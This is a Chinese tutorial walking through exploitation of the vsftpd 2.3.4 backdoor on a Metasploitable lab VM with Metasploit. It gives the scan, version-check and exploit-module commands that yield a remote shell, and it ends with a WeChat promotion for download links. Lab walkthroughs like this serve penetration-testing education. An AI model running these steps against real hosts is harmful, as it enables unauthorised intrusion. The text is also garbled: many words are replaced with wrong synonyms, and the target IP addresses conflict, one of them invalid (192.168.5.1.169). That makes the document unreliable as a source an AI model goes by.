引言
Metasploit我的项目是一个旨在提供安全漏洞信息计算机平安我的项目,能够帮助平安工程师进行浸透测试(penetration testing)及入侵检测零碎签名开发。Metasploit我的项目最为出名的子项目是开源的Metasploit框架,一套针对近程主机进行开发和执行“exploit代码”的工具。
Metasploitable 是一个刻意制作进去蕴含破绽的Linux虚拟机零碎。它能够用来做平安训练,测试平安工具和练习浸透测试技术。本文将应用Metasploit和Metasploitable和大家独特分享一下如何应用Metasploit这块浸透测试利器针对特定版本的vsftpd进行利用达到控制目标主机的目标。本文采纳Metasploit和Metasploitable的镜像安装包,从而免去了繁琐的软件装置、环境配置阶段,相干下载链接在文章开端。
利用的vsftpd
2.3.4版本的vsftpd存在这样的一个破绽,当在用户名后加上":)"时会触发ftp服务器的6200端口连贯的shell
浸透利用过程
(1)首先应用nmap查看指标主机,指标即为装置了Metasploitable的服务器(本文装置Metasploit的服务器IP:192.168.5.141,装置Metasploitable的服务器ip:192.168.5.1.169)凋谢的端口
执行命令:nmap 192.168.5.169
(2)应用Metasploit搜查和ftp无关的扫描模块,执行命令:search scanner/ftp
(3)因为该破绽只针对特定版本的vsftpd(2.3.4版本)所以首选须要应用auxiliary/scanner/ftp/ftp_version模块探测指标机器上vsftpd的版本号
执行命令 1、use auxiliary/scanner/ftp/ftp_version
2、set RHOSTS 192.168.5.159
3、exploit
(4)搜查该服务可能被利用的利用模块
search vsftpd
(5)应用该模块
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.5.169
exploit
总结
咱们通过利用2.3.4版本的ftp存在一个backdoor破绽胜利拿到指标机器的shell。以上过程仅供大家学习,不足之处也心愿大家多多指导!切勿将其非法路径,违法必究!
下载链接:首先请关注微信公众号平安明码盒,扫描下方二维码即可关注
回复"metasploit"即可获取Metasploit的下载链接
回复“metasploitable”即可获取Metasploitable的下载链接